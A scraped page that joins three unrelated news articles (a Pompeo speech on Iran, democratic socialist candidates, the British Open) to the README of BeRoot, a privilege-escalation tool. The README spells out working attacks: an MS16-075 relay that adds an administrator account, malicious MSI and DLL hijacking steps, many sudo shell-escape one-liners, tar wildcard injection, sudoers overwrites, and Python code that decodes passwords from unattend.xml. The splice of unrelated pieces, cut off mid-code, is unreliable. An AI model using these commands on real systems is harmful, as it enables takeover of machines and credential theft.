
Pompeo to Urge Iranians Abroad to 'Support' Anti-Regime Protests


U.S. Secretary of State Mike Pompeo plans on Sunday to urge members of the Iranian diaspora to “support” protesters in Iran, as the Trump administration hints at a desire for regime change in Tehran after turning its back on the Iranian nuclear accord.


President Donald Trump – who has made the Islamic republic a favorite target since his unexpected rapprochement with North Korea – decided on May 8 to restore all the sanctions that had been lifted as part of the multi-nation agreement aimed at preventing Iran from developing nuclear weapons.


Following the U.S. withdrawal that stunned even Washington’s closest European allies, Pompeo on May 21 unveiled a “new strategy” intended to force Iran to yield to a dozen stringent demands or else face the “strongest sanctions in history.”


The next U.S. step is due at 9 p.m. EDT Sunday (0100 UTC Monday) in the Ronald Reagan presidential library in Simi Valley, California, when the secretary of state delivers a speech entitled “Supporting Iranian Voices.”


With the 40th anniversary of the Islamic Revolution of 1979 a year away, Pompeo plans to retrace “40 years of stealing from the Iranian people, the terrorism they have committed around the region, the brutal repression at home” as well as the “religious persecution” there, a senior State Department official told reporters ahead of the speech.


The venue for Pompeo’s address is significant, the official noted: some 250,000 Iranian-Americans live in Southern California.


“He will be exposing some of the corruption” of a “kleptocratic regime,” the diplomat told reporters. “The regime has prioritized its ideological agenda over the welfare of the Iranian people.”


Pompeo launched his campaign against Iran on Twitter last month, saying the government in Tehran and the Revolutionary Guards – the regime’s elite armed corps – had “plundered the country’s wealth” in proxy wars “while Iranian families struggle.”





FILE - Steel workers angered by nonpayment of wages protest outside a government building in Qazvin, Iran, April 25, 2018. (Social media)


Exploiting growing tensions within


The Trump administration’s strategy appears simple: to exploit the already growing tensions within Iranian society that are being exacerbated by renewed U.S. sanctions that have forced some foreign firms to leave.


There have been a series of anti-government protests in Iran in recent months, prompted by an array of different issues and concerns.


The State Department briefer said Pompeo plans to support “the legitimate demands of the Iranian people, especially their economic demands for a better life.”


But how far will he and the administration go?


“That’s the key question,” Behnam Ben Taleblu of the conservative pressure group Foundation for Defense of Democracies (FDD), told the French news agency AFP. “Pompeo and the administration can do more than just rhetorical support to the Iranian protester.”


Several Iranian dissidents have written to Pompeo to urge him to re-establish punitive measures against the state-owned Islamic Republic of Iran Broadcasting network, which they accuse of abetting human rights violations.


Word of Pompeo’s planned speech has fanned speculation on Washington’s precise intentions.


The State Department insists that the U.S. seeks merely a “change in behavior” by the regime.


But some senior members of the Trump administration – notably national security advisor John Bolton – have made it clear in the past that they would like to see the Tehran regime topple, and Pompeo himself said in May that “the Iranian people get to choose for themselves the kind of leadership they want.”


To Behnam Ben Taleblu, “genuine regime change can only come from inside.”


With an upsurge of “Iranians of all different social classes protesting,” he said, the Trump administration will have to decide whether it wants to “support elements that actually want to change the regime.”


Diplomats and experts in Washington are divided as to whether the protests and social tensions within Iran pose a true threat to the Islamic republic.


Nor is there agreement on what it would actually mean should the Iranian regime fall – but some find that uncertainty deeply worrying.


“The more likely result of regime collapse would be a military coup in the name of restoring order, led by the man Washington’s Iran hawks fear the most: Gen. Qasem Suleimani,” the commander of the Revolutionary Guards’ Quds Force, according to Mark Fitzpatrick of the International Institute for Strategic Studies.


“Exerting maximum pressure on Iran could bring about America’s worst nightmare,” he added on Twitter.

Democratic Socialism Rising in the Age of Trump



A week ago, Maine Democrat Zak Ringelstein wasn’t quite ready to consider himself a member of the Democratic Socialists of America, even if he appreciated the organization’s values and endorsement in his bid to become a U.S. senator.


Three days later, he told The Associated Press it was time to join up. He’s now the only major-party Senate candidate in the nation to be a dues-paying democratic socialist.


Ringelstein’s leap is the latest evidence of a nationwide surge in the strength and popularity of an organization that, until recently, operated on the fringes of the liberal movement’s farthest left flank. As Donald Trump’s presidency stretches into its second year, democratic socialism has become a significant force in Democratic politics. Its rise comes as Democrats debate whether moving too far left will turn off voters.


“I stand with the democratic socialists, and I have decided to become a dues-paying member,” Ringelstein told AP. “It’s time to do what’s right, even if it’s not easy.”


There are 42 people running for offices at the federal, state and local levels this year with the formal endorsement of the Democratic Socialists of America, the organization says. They span 20 states, including Florida, Hawaii, Kansas and Michigan.


The most ambitious Democrats in Washington have been reluctant to embrace the label, even as they embrace the policies defining modern-day democratic socialism: Medicare for all, a $15 minimum wage, free college tuition and the abolition of the federal department of Immigration and Customs Enforcement, also known as ICE.


Vermont Sen. Bernie Sanders, Congress’ only self-identified democratic socialist, campaigned Friday with the movement’s newest star, New York City congressional candidate Alexandra Ocasio-Cortez, a 28-year-old former bartender who defeated one of the most powerful House Democrats last month.


Her victory fed a flame that was already beginning to burn brighter. The DSA’s paid membership had hovered around 6,000 in the years before Trump’s election, said Allie Cohn, a member of the group’s national political team.


Last week, its paid membership hit 45,000 nationwide.


There is little distinction made between the terms “democratic socialism” and “socialism” in the group’s literature. While Ringelstein and other DSA-backed candidates promote a “big-tent” philosophy, the group’s constitution describes its members as socialists who “reject an economic order based on private profit” and “share a vision of a humane social order based on popular control of resources and production, economic planning, equitable distribution, feminism, racial equality and non-oppressive relationships.”


Members during public meetings often refer to each other as “comrades,” wear clothing featuring socialist symbols like the rose and promote authors such as Karl Marx.


The common association with the failed Soviet Union has made it difficult for sympathetic liberals to explain their connection.


“I don’t like the term socialist, because people do associate that with bad things in history,” said Kansas congressional candidate James Thompson, who is endorsed by the DSA and campaigned alongside Sanders and Ocasio-Cortez, but is not a dues-paying democratic socialist. “There’s definitely a lot of their policies that closely align with mine.”


Thompson, an Army veteran turned civil rights attorney, is running again after narrowly losing a special election last year to fill the seat vacated by Secretary of State Mike Pompeo. Even in deep-red Kansas, he embraces policies like “Medicare for all” and is openly critical of capitalism.


In Hawaii, 29-year-old state Rep. Kaniela Ing isn’t shy about promoting his status as a democratic socialist in his bid for Congress. He said he was encouraged to run for higher office by the same activist who recruited Ocasio-Cortez.


“We figured just lean in hard,” Ing told the AP of the democratic socialist label. He acknowledged some baby boomers may be scared away, but said the policies democratic socialists promote — like free health care and economic equality — aren’t extreme.


Republicans, meanwhile, are encouraged by the rise of democratic socialism — for a far different reason. They have seized on what they view as a leftward lurch by Democrats they predict will alienate voters this fall and in the 2020 presidential race.


The Republican National Committee eagerly notes that Sanders’ plan to provide free government-sponsored health care for all Americans had no co-sponsors in 2013. Today, more than one-third of Senate Democrats and two-thirds of House Democrats have signed onto the proposal, which by one estimate could cost taxpayers as much as $32 trillion.


The co-sponsors include some 2020 presidential prospects, such as Massachusetts Sen. Elizabeth Warren, New Jersey Sen. Cory Booker, New York Sen. Kirsten Gillibrand and California Sen. Kamala Harris.


Those senators aren’t calling themselves democratic socialists, but they also aren’t disassociating themselves from the movement’s priorities.


Most support the push to abolish ICE, which enforces immigration laws and led the Trump administration’s recent push to separate immigrant families at the U.S.-Mexico border.


Of the group, only Booker hasn’t called for ICE to be abolished, replaced or rebuilt. Yet Booker’s office notes that he’s among the few senators backing a plan to guarantee government-backed jobs to unemployed adults in high-unemployment communities across America.


“Embracing socialist policies like government-run health care, a guaranteed jobs program and open borders will only make Democrats more out of touch,” RNC Chair Ronna Romney McDaniel said.


Despite Ocasio-Cortez’s recent success, most DSA-endorsed candidates have struggled.


Gayle McLaughlin finished eighth in last month’s Democratic primary to become California’s lieutenant governor, earning just 4 percent of the vote. All three endorsed candidates for Maryland’s Montgomery County Council lost last month as well. And Ryan Fenwick was blown out by 58 points in his run to become mayor of Louisville, Kentucky.


Ringelstein, a 32-year-old political neophyte, is expected to struggle in his campaign to unseat Maine Sen. Angus King, an independent who caucuses with Democrats. He is refusing to accept donations from lobbyists or corporate political action committees, which has made fundraising a grind. At the end of June, King’s campaign reported $2.4 million cash on hand while Ringelstein had just $23,000.


He has tapped into the party’s national progressive movement and the southern Maine chapter of the DSA for the kind of grassroots support that fueled Ocasio-Cortez’s victory. As he has done almost every month this year, Ringelstein attended the group’s monthly meeting at Portland’s city hall last Monday.


More than 60 people packed into the room. The group’s chairman, 25-year-old union organizer Meg Reilly, wore a T-shirt featuring three roses.


She cheered the “comrades” softball team’s recent season before moving to an agenda that touched on climate change legislation, a book share program “to further your socialist education,” and an exchange program that lets community members swap favors such as jewelry repair, pet sitting or cooking.


Near the end of the two-hour gathering, Ringelstein thanked the group for “standing shoulder to shoulder with us throughout this entire campaign.”


“We could win a U.S. Senate seat!” he said. “I want to say that over and over. We could win a U.S. Senate seat! So, let’s do this.”

Italy's Molinari Wins Golf's British Open



Professional golfer Francesco Molinari won his first major championship Sunday, defeating an array of the sport’s top stars at the British Open in Carnoustie, Scotland.


The 35-year-old Molinari became the first Italian to capture one of golf’s four major annual titles, shooting a final round 2-under-par 69. He completed a bogey-free round with a 5-foot birdie putt on the 18th hole and then waited to claim the tournament’s Claret Jug trophy as other contenders faltered at the end.


For the tournament, Molinari was 8 under par, two better than a quartet of golfers, Britain’s Justin Rose, Northern Ireland’s Rory McIlroy and two Americans, Xander Schauffele and Kevin Kisner.


The tourney marked the return to prominence for Tiger Woods, the U.S. golfer who has won 14 major championships but none since 2008. With a pair of birdies and eight pars through the first 10 holes Sunday, Woods surged into the lead, but promptly relinquished it with a double bogey on the 11th and a bogey on the 12th.


Woods completed the tourney in sixth place, three shots back of Molinari, his playing partner. It was Woods’ best showing in a major championship since his fourth-place finish at the 2013 Masters in the United States.


BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS


A compiled version is available here.


It will be added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk).


Except for one method (the MS16-075 exploitation described below), this tool only detects misconfigurations; it does not exploit them. If something is found, the provided templates can be used to exploit it: create a test.bat file next to the service binary / DLL, and the template will execute it once called. Depending on the Redistributable Packages installed on the target host, these compiled templates may not work.




Check the Following:


  • BeRoot For Windows 

  • BeRoot For Linux



BeRoot For Windows To Check Common Windows Misconfigurations



Run it


|====================================================================|
|                                                                    |
|                    Windows Privilege Escalation                    |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|


usage: beRoot.exe [-h] [-l] [-w] [-c CMD]

Windows Privilege Escalation

optional arguments:
  -h, --help         show this help message and exit
  -l, --list         list all installed software (not run by default)
  -w, --write        write output
  -c CMD, --cmd CMD  command to execute for the WebClient check (default: whoami)



All detection methods are described in the following document.



Path containing space without quotes



Consider the following file path:


C:\Program Files\Some Test\binary.exe



If the path contains spaces and is not quoted, Windows tries to locate and execute programs in the following order:

  • C:\Program.exe
  • C:\Program Files\Some.exe
  • C:\Program Files\Some Test\binary.exe

Following this example, if the “C:\” folder is writable, it would be possible to create a malicious executable called “Program.exe”. If “binary.exe” runs with high privileges (as a service, a scheduled task or a startup entry), this is a good way to escalate our privileges.


Note: BeRoot performs these checks on every service path, scheduled task and startup key located in HKLM.



How to exploit: 



The vulnerable path runs as:

  • a service: create a malicious service (or compile the service template)
  • a classic executable: create your own executable.
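As an added example (not BeRoot's own code), here is the check described in this section written in Python, the language BeRoot itself is written in: it expands an unquoted ImagePath into the program names CreateProcess would try, lists the ones an attacker could plant, and on Windows reads the real ImagePath values with winreg. The service table is constructed, and stopping at the first ".exe" is a simplification of CreateProcess's search.

```python
"""Added example (not BeRoot's code): enumerate the executables Windows would
try for an unquoted service path and flag the ones an attacker could plant."""
import ntpath
import os


def hijack_candidates(image_path: str) -> list:
    """Program names CreateProcess tries, in order, for an unquoted command line.

    CreateProcess splits the string at each space and tries the prefix as a
    program, appending ".exe" when the prefix has no extension.  We stop at the
    first prefix that already ends in ".exe" and treat it as the real binary
    (everything after it is arguments).  Quoted or space-free paths yield [].
    """
    image_path = image_path.strip()
    if image_path.startswith('"') or " " not in image_path:
        return []
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates


def plantable(image_path: str) -> list:
    """Paths an attacker could create: every candidate tried before the real binary."""
    return hijack_candidates(image_path)[:-1]


def writable_plant_points(image_path: str) -> list:
    """Live check: candidates whose parent directory the current user can write to.
    os.access is coarse; confirm with icacls or AccessChk before relying on it."""
    return [p for p in plantable(image_path) if os.access(ntpath.dirname(p), os.W_OK)]


# Constructed ImagePath values, modelled on HKLM\SYSTEM\CurrentControlSet\Services\<svc>\ImagePath
SAMPLE_SERVICES = {
    "GoodSvc": r'"C:\Program Files\Good Vendor\good.exe" -service',   # quoted: safe
    "BadSvc": r"C:\Program Files\Some Test\binary.exe -k run",        # unquoted, spaces
    "HostSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",         # spaces only in args
}


def find_unquoted_paths(services: dict) -> dict:
    """Map service name -> plantable paths, for services with a hijackable ImagePath."""
    return {name: plantable(path) for name, path in services.items() if plantable(path)}


def services_from_registry() -> dict:
    """Windows only: read every service's ImagePath (REG_EXPAND_SZ values are left unexpanded)."""
    import winreg  # only exists on Windows
    out = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:
                break
            index += 1
            try:
                with winreg.OpenKey(root, name) as key:
                    out[name] = winreg.QueryValueEx(key, "ImagePath")[0]
            except OSError:
                continue  # no ImagePath (drivers, legacy entries)
    return out


if __name__ == "__main__":
    services = services_from_registry() if os.name == "nt" else SAMPLE_SERVICES
    for svc, paths in find_unquoted_paths(services).items():
        print(f"{svc}: plant one of {paths}")
```

On a real host, feed the output of find_unquoted_paths() into writable_plant_points() for each hit; a service that runs as LocalSystem with a writable plant point is the case the text describes.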



Writable directory



Consider the following file path:


C:\Program Files\Some Test\binary.exe



If the directory containing “binary.exe” (“C:\Program Files\Some Test”) is writable and the binary runs with high privileges, it can be used to elevate our privileges.


Note: BeRoot performs these checks on every service path, scheduled task and startup key located in HKLM.



How to exploit:



  • The service is not running:

Replace the legitimate binary with our own, then restart the service or check how it is triggered (at reboot, when another process starts, etc.).

  • The service is running and cannot be stopped:

This is the most common case: check for DLL hijacking in the writable directory and try to restart the service using the previous techniques.



Writable directory on %PATH%



This technique affects the following Windows versions:


  • 6.0  => Windows Vista / Windows Server 2008

  • 6.1  => Windows 7 / Windows Server 2008 R2

  • 6.2  => Windows 8 / Windows Server 2012

On a default Windows installation (SafeDllSearchMode enabled), when a binary loads a DLL by name without an absolute path, Windows looks for it in the following locations, in order:

– Directory where the binary is located
– C:\Windows\System32
– C:\Windows\System
– C:\Windows\
– Current directory of the process
– Directories listed in the %PATH% environment variable



If a directory on %PATH% is writable, DLL hijacking becomes possible: the goal is then to find a service that loads a DLL which does not exist in any of the earlier locations, so that the search falls through to our directory. This is the case for the default “IKEEXT” service, which tries to load the non-existent “wlbsctrl.dll”.



How to exploit: 


Create a malicious DLL called “wlbsctrl.dll” (use the DLL template) and drop it in the writable directory listed in %PATH%. Then start the “IKEEXT” service. To start IKEEXT without high privileges, a technique described in the French magazine MISC 90 uses the following method:



Create a file as following:


C:\Users\bob\Desktop>type test.txt
[IKEEXTPOC]
MEDIA=rastapi
Port=VPN2-0
Device=Wan Miniport (IKEv2)
DEVICE=vpn
PhoneNumber=127.0.0.1



Use the “rasdial” binary to dial this phonebook entry, which starts the “IKEEXT” service. Even if the connection fails, the service will have been started (and our DLL loaded):


C:\Users\bob\Desktop>rasdial IKEEXTPOC test test /PHONEBOOK:test.txt


Alternatively, you can use the Ikeext-Privesc PowerShell script.



MS16-075


For French readers, I recommend the article in MISC 90, which explains in detail how it works.


This vulnerability was fixed by Microsoft in MS16-075; however, many servers are still vulnerable to this kind of attack. I was inspired by the C++ PoC available here.



Here is an outline of how it works (not in detail):

  1. Start the WebClient service (used to access WebDAV shares) using some magic tricks (via its UUID)
  2. Start an HTTP server locally
  3. Find a service that can be used to trigger an NTLM authentication from the SYSTEM account
  4. Enable file tracing on this service by modifying its registry key to point at our web server (a WebDAV UNC path to localhost, e.g. \\127.0.0.1@80\tracing)
  5. Start this service
  6. Our HTTP server starts an NTLM negotiation and receives the SYSTEM account’s authentication
  7. Relay this authentication over SMB to execute our custom payload (smbrelayx has been modified to do this)
  8. Clean everything up (stop the service, clean the registry, etc.)


How to exploit: 


BeRoot performs this exploitation; use the “-c” option to run a custom command on the vulnerable host:

beRoot.exe -c "net user Zapata LaLuchaSigue /add"
beRoot.exe -c "net localgroup Administrators Zapata /add"



AlwaysInstallElevated registry key


AlwaysInstallElevated is a policy that lets non-privileged users install Windows Installer packages (MSI) with elevated (SYSTEM) privileges. It is only active when both of the following registry values are set to 1:


  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated


How to exploit: 


Build a malicious MSI package (e.g. with msfvenom -f msi) and install it with msiexec; the payload runs as SYSTEM.



Unattended Install files


These files contain the configuration settings used during an unattended installation, which can include credentials for local accounts, including the Administrator account. They are found at the following paths:


C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\unattend.xml 
C:\Windows\System32\Sysprep\Panther\unattend.xml




How to exploit: 


Open the unattend.xml file and check whether passwords are present. It should look like the following (when PlainText is false, the Value is Base64-encoded):


<UserAccounts>
    <LocalAccounts>
        <LocalAccount>
            <Password>
                <Value>RmFrZVBhc3N3MHJk</Value>
                <PlainText>false</PlainText>
            </Password>
            <Description>Local Administrator</Description>
            <DisplayName>Administrator</DisplayName>
            <Group>Administrators</Group>
            <Name>Administrator</Name>
        </LocalAccount>
    </LocalAccounts>
</UserAccounts>
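Added example, not from BeRoot: a small Python parser for the files listed above. It extracts LocalAccount entries and AdministratorPassword, and decodes the password field. The sample XML is constructed: it reuses the page's account and adds an AdministratorPassword in the encoding Windows actually writes when PlainText is false (UTF-16LE of the password with the element name appended, then Base64); the decoder handles both that form and plain Base64 like the page's sample.

```python
"""Added example (not BeRoot's code): extract and decode credentials from unattend.xml."""
import base64
import xml.etree.ElementTree as ET

UNATTEND_PATHS = [
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Unattended.xml",
    r"C:\Windows\Panther\Unattend\Unattended.xml",
    r"C:\Windows\Panther\Unattend\Unattend.xml",
    r"C:\Windows\System32\Sysprep\unattend.xml",
    r"C:\Windows\System32\Sysprep\Panther\unattend.xml",
]

# Windows appends the element name to the password before UTF-16LE + Base64 encoding it
_REAL_ADMIN_PW = base64.b64encode("S3cret!AdministratorPassword".encode("utf-16-le")).decode()

# Constructed sample: the page's LocalAccount plus an AdministratorPassword in the real encoding
SAMPLE_XML = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>RmFrZVBhc3N3MHJk</Value><PlainText>false</PlainText></Password>
            <Description>Local Administrator</Description>
            <DisplayName>Administrator</DisplayName>
            <Group>Administrators</Group>
            <Name>Administrator</Name>
          </LocalAccount>
        </LocalAccounts>
        <AdministratorPassword><Value>{_REAL_ADMIN_PW}</Value><PlainText>false</PlainText></AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""


def _local(tag: str) -> str:
    """Strip the XML namespace: '{urn:...}Name' -> 'Name'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(element, name: str) -> str:
    for child in element:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def decode_unattend_password(value: str, plaintext: bool, suffix: str = "Password") -> str:
    """Recover the clear-text password from a <Value> element.

    Real unattend files hold Base64(UTF-16LE(password + element name)); hand-written
    samples often hold plain Base64(password).  Fall back to the latter when the
    UTF-16LE decoding does not end with the expected suffix.
    """
    if plaintext:
        return value
    raw = base64.b64decode(value)
    if len(raw) % 2 == 0:
        try:
            text = raw.decode("utf-16-le")
        except UnicodeDecodeError:
            text = ""
        if text.endswith(suffix):
            return text[: -len(suffix)]
    return raw.decode("utf-8", errors="replace")


def extract_credentials(xml_text: str) -> list:
    """Return one dict (name, group, password) per account password found."""
    found = []
    for element in ET.fromstring(xml_text).iter():
        kind = _local(element.tag)
        if kind == "LocalAccount":
            pw = next((c for c in element if _local(c.tag) == "Password"), None)
            if pw is None:
                continue
            found.append({
                "name": _child_text(element, "Name"),
                "group": _child_text(element, "Group"),
                "password": decode_unattend_password(
                    _child_text(pw, "Value"), _child_text(pw, "PlainText").lower() == "true", "Password"),
            })
        elif kind == "AdministratorPassword":
            found.append({
                "name": "Administrator",
                "group": "Administrators",
                "password": decode_unattend_password(
                    _child_text(element, "Value"), _child_text(element, "PlainText").lower() == "true",
                    "AdministratorPassword"),
            })
    return found


def scan_unattend_files(paths=UNATTEND_PATHS) -> dict:
    """Live check: parse whichever of the known files exist and contain credentials."""
    results = {}
    for path in paths:
        try:
            with open(path, encoding="utf-8-sig") as fh:
                creds = extract_credentials(fh.read())
        except (OSError, ET.ParseError):
            continue
        if creds:
            results[path] = creds
    return results
```

The page's sample value decodes to FakePassw0rd as plain Base64, which is why the decoder keeps that fallback; a file written by Windows Setup will take the UTF-16LE branch instead.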




Other possible misconfigurations



Other tests are performed to check whether it is possible to:


  • Modify an existing service

  • Create a new service

  • Modify a startup key (on HKLM)

  • Modify directory where all scheduled tasks are stored: “C:\Windows\system32\Tasks”





BeRoot For Linux




BeRoot is a post exploitation tool to check common misconfigurations on Linux and Mac OS to find a way to escalate our privileges.

To understand privilege escalation on these systems, you should understand at least two main notions: LOLBins (the name was coined for Windows binaries but applies equally well to Linux) and wildcards.

This README explains all the techniques implemented by BeRoot, to better understand the results and how to exploit them.


LOLBins



LOLBins can be used to gain root privileges on a system. These binaries let a user execute arbitrary code on the host, so if you can run one of them with root privileges (a SUID binary, or one allowed in the sudoers file), you can execute system commands as root.


Here is a list of well-known binaries:

  • awk

sudo awk 'BEGIN {system("/bin/sh")}'

  • docker (if you can call docker, no need to run it with sudo)

docker run -v /home/$USER:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

  • find

sudo find . -type d -exec sh -c id \;

  • file viewers

less: !bash
man: !bash or sudo man -P whoami man
more: !bash

  • file modifications (not LOLBins strictly speaking, but useful for privilege escalation)

cp: sudo cp -f your_file /etc/sudoers
mv: sudo mv -f your_file /etc/sudoers

  • ftp / sftp

!/bin/sh (shell escape from the interactive prompt)

  • git

export PAGER=./runme.sh
sudo git -p help

  • mount

sudo mount -o bind /bin/bash /bin/mount
sudo mount

  • nmap

echo "os.execute('/bin/sh')" > /tmp/script.nse
sudo nmap --script=/tmp/script.nse

  • rsync

echo "whoami > /tmp/whoami" > /tmp/tmpfile
sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
cat /tmp/whoami

  • scripting languages

lua: os.execute('/bin/sh')
perl: sudo perl -e 'exec "/bin/sh";'
python: sudo python -c 'import os;os.system("/bin/sh")'
ruby: sudo ruby -e 'exec "/bin/sh"'

  • tar

sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh

  • text editors

vi: sudo vi -c '!sh' or :!bash or :set shell=/bin/bash:shell or :shell
vim: sudo vim -c '!sh' or :!bash or :set shell=/bin/bash:shell or :shell

  • tcpdump (the -z post-rotate command must be executable)

echo "whoami > /tmp/whoami" > /tmp/tmpfile
chmod +x /tmp/tmpfile
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/tmpfile -Z root
cat /tmp/whoami

  • wget (overwrite a system file; needs a web server)

sudo wget http://127.0.0.1/sudoers -O /etc/sudoers

  • zip

echo "/bin/sh" > /tmp/run.sh
sudo zip z.zip * -T -TT /tmp/run.sh

Note: If you have more binary examples, do not hesitate to open an issue explaining the technique and I will add it to the list.


Having sudo access to one of these binaries does not always mean you will manage to execute commands on the system. For example, using the mount binary as a limited user may give you the following well-known error if it is correctly configured:

mount: only root can use "--options" option


Wildcards



If you have never heard of Unix wildcards, I suggest you read this very well explained article. Using wildcards can lead to code execution if the command is not called carefully.


For our example, we want to get a shell (“sh”) using the tar command to execute code on the server. As explained in the LOLBins section, we could get it with:

tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh

Now consider a script, test.sh, that archives all files in the current directory:

tar cf archive.tar *


Here are the steps to exploit this bad configuration:

  • open nano (with no arguments)
  • write something in it
  • save the file using tar arguments as file names:
      --checkpoint-action=exec=sh
      --checkpoint=1

Any way of creating files with exactly these names works (e.g. touch -- --checkpoint=1). Once created, this is what you will find:

-rw-r--r-- 1 user user     5 Jan 12 10:34 --checkpoint-action=exec=sh
-rw-r--r-- 1 user user     3 Jan 12 10:33 --checkpoint=1
drwxr-xr-x 2 user user  4096 Jan 12 10:34 .
drwxr-xr-x 7 user user  4096 Jan 12 10:29 ..
-rwxr-xr-x 1 user user    22 Jan 12 10:32 test.sh

When the shell expands *, these file names are passed to tar as options. If test.sh is executed as root (from a crontab, via sudoers, etc.), you get a root shell:


sh-4.3# id


uid=0(root) gid=0(root) groups=0(root)


So depending on which binary is used and how the wildcard is written, exploitation may or may not be possible. In our example it would no longer work if the script read:

tar cf archive.tar *.txt

Detecting these misconfigurations automatically is therefore hard; each hit needs manual analysis to rule out a false positive.
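To show why the detection is heuristic, here is an added Python example (not BeRoot's code) of a wildcard scanner over a script: it flags only LOLBins from the list above called with a bare * or dir/*, skips *.txt-style patterns and quoted '*', and reports the directory the wildcard expands in (tracked from cd lines) so the writability check can follow. The cron script is constructed.

```python
"""Added example (not BeRoot's code): heuristic wildcard-injection scanner for shell scripts."""
import os
import re
import shlex

# Binaries from the LOLBins list whose options can be smuggled in as file names
WILDCARD_TARGETS = {"tar", "rsync"}
# Split a line into simple commands on ; && || |
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
ENV_ASSIGNMENT = re.compile(r"[A-Za-z_]\w*=.*")


def find_wildcard_issues(script: str) -> list:
    """Return (line_number, binary, directory) for each injectable wildcard.

    Only a bare `*` or a `dir/*` is reported: `*.txt` constrains the names an
    attacker can create, and a quoted '*' never globs.  `directory` is the last
    `cd` target seen, or None when the working directory is unknown.
    """
    findings = []
    cwd = None
    for lineno, line in enumerate(script.splitlines(), 1):
        for segment in SEPARATORS.split(line):
            try:
                # posix=False keeps quotes on tokens, so '*' stays distinct from *
                tokens = shlex.split(segment, comments=True, posix=False)
            except ValueError:
                continue  # unbalanced quotes: skip this segment
            while tokens and (tokens[0] == "sudo" or ENV_ASSIGNMENT.fullmatch(tokens[0])):
                tokens.pop(0)  # strip sudo / VAR=value prefixes
            if not tokens:
                continue
            binary = os.path.basename(tokens[0])
            if binary == "cd" and len(tokens) > 1:
                cwd = tokens[1]
                continue
            if binary not in WILDCARD_TARGETS:
                continue
            for tok in tokens[1:]:
                if tok == "*":
                    findings.append((lineno, binary, cwd))
                elif tok.endswith("/*"):
                    findings.append((lineno, binary, tok[:-2] or "/"))
    return findings


def exploitable_now(findings: list) -> list:
    """Live check: keep findings whose expansion directory we can write to.
    An unknown directory is kept for manual review (BeRoot leaves this step to the analyst)."""
    return [f for f in findings if f[2] is None or os.access(f[2], os.W_OK)]


# Constructed sample: a nightly backup job installed in root's crontab
SAMPLE_CRON_SCRIPT = """#!/bin/sh
# constructed: nightly backup job run from root's crontab
cd /srv/uploads
tar cf /backup/uploads.tar *             # bare *: injectable in /srv/uploads
tar cf /backup/logs.tar /var/log/app/*   # dir/*: injectable in /var/log/app
tar cf /backup/docs.tar *.txt            # *.txt: not reported
rsync -a '*' backup:/srv/                # quoted: never globs
"""

if __name__ == "__main__":
    for lineno, binary, directory in find_wildcard_issues(SAMPLE_CRON_SCRIPT):
        print(f"line {lineno}: {binary} expands * in {directory or '<unknown cwd>'}")
```

Run against /etc/cron.* scripts and anything referenced from the sudoers file; every hit still needs the manual check the text calls for, since a script can change directory in ways this tracker does not follow.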


Sensitive files



Many files are executed with high privileges on the system (e.g. cron jobs, services, etc.). Here are some interesting directories and files:


  • /etc/init.d

  • /etc/cron.d 

  • /etc/cron.daily

  • /etc/cron.hourly

  • /etc/cron.monthly

  • /etc/cron.weekly

  • /etc/sudoers

  • /etc/exports

  • /etc/at.allow

  • /etc/at.deny

  • /etc/crontab

  • /etc/cron.allow

  • /etc/cron.deny

  • /etc/anacrontab

  • /var/spool/cron/crontabs/root



Here are the tests done by BeRoot:

  • checks whether you have write permission on these files.
  • checks inside each file for other paths you have write permission on.
  • checks for wildcards (this check can raise false positives, but can also give you useful information). Sometimes you also need write permission on a specific folder to create your malicious file names (as explained in the wildcard section); this check is not done, because a script can reach that folder in too many ways for it to be automated.
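Added example (not BeRoot's code): parsing crontab-format files (the system crontab and /etc/cron.d entries carry a user field) to list the absolute paths each job touches, which is the input for the write-permission checks above. The crontab text is constructed; writable() is the live check.

```python
"""Added example (not BeRoot's code): list the paths a system crontab's jobs depend on."""
import os
import re
import shlex

SENSITIVE_FILES = [
    "/etc/init.d", "/etc/cron.d", "/etc/cron.daily", "/etc/cron.hourly",
    "/etc/cron.monthly", "/etc/cron.weekly", "/etc/sudoers", "/etc/exports",
    "/etc/at.allow", "/etc/at.deny", "/etc/crontab", "/etc/cron.allow",
    "/etc/cron.deny", "/etc/anacrontab", "/var/spool/cron/crontabs/root",
]

ENV_ASSIGNMENT = re.compile(r"[A-Za-z_]\w*=")


def parse_system_crontab(text: str) -> list:
    """Return (user, command) for each job line of a system crontab / cron.d file."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue  # blank, comment or SHELL=/PATH=/MAILTO= assignment
        if line.startswith("@"):
            fields = line.split(None, 2)          # @reboot  user  command
            if len(fields) != 3:
                continue
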